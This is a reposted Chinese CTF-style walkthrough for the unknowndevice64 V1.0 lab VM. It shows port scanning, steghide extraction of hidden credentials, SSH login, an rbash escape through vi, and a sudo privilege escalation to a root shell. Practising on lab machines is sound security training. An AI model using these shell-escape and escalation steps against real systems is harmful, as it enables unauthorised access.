您的位置:首页 > 教育 > 培训 > unknowndevice64-V1.0靶机

unknowndevice64-V1.0靶机

2024/10/6 6:44:01 来源:https://blog.csdn.net/m0_65285254/article/details/141111823  浏览:    关键词:unknowndevice64-V1.0靶机

vmware 打开 靶机,设置nat网卡

端口扫描

全端口扫描

http 是31337端口 ssh是1337端口

目录扫描

没什么信息

31337 端口为http服务 访问

f12查看源码

发现有一个图片 key_is_h1dd3n.jpg

查看图片,上面写着隐藏的秘密

将图片下载,用kali工具 steghide 提取信息,密码是 h1dd3n

steghide extract -sf key_is_h1dd3n.jpg

查看内容 是brainfuck加密

使用BerylEnigma工具解密,

账号密码 ud64:1M!#64@ud

ssh连接

ssh ud64@192.168.153.152 -p 1337

发现很多命令被限制,是rbash的shell

发现vi 和 export 命令可用

vi

按住 shift,:,+

!/bin/bash

配置环境变量

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

sudo提权 sudo -l

sudo sysud64 -o /dev/null /bin/bash

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com